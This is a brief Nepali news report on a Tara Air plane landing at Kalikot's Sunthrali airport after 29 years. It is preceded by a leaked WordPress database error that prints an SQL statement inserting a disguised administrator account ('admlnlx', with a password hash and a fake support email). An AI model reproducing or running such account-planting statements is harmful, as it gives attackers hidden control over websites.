WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPrDKSE4gBiT8kEQ0z9tGPmyDfETDH1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 09:17:42', '', 'admlnlx', 'admlnlx')
कालीकोट, माघ २९ –
कालीकोट जिल्लाको सुनथराली विमान स्थलमा २९ बर्ष पछि तारा एअर विमान अवतरण भएको छ ।लामो समयको अन्तराल पछि कालीकोटवासीले विमान देख्ने सपना विपनामा परिणत भएकोमा खुसि व्यक्त गरेका छन् ।

माननिय पर्यटन मन्बी जीवन बहादुर शाहीको विषेश पहलमा विमान अवतरण भएको हो । कालिकोट जिल्लाको सुन्थराली एअरपोर्टमा २०७३ साल माघ २९ गते क्याप्टेन सन्तोष शाहको टीमले टेस्ट फ्लाइट गरेर सफल अवतरण भएको जानकारी हाम्रा सहकर्मी दलसिँह गिरीले दिएका छन् ।

सुन्थरालिमा अवतरण हुने पहिलोे प्लेन र अवतरण गराउने उक्त साहसिक टीमलाइ भब्य स्वागत गर्न सम्पूर्ण कालिकोट जिल्लाबासी तथा सुनथरालीबाट कालिकोटलाई सुनको मुल फुटाउने कालिकोटवासिले विमानलाई राष्ट्रियफूल लालिगुराँसको माला लगाएर स्वागत गरेका छन् ।

तस्बिर – प्रदिप बोहरा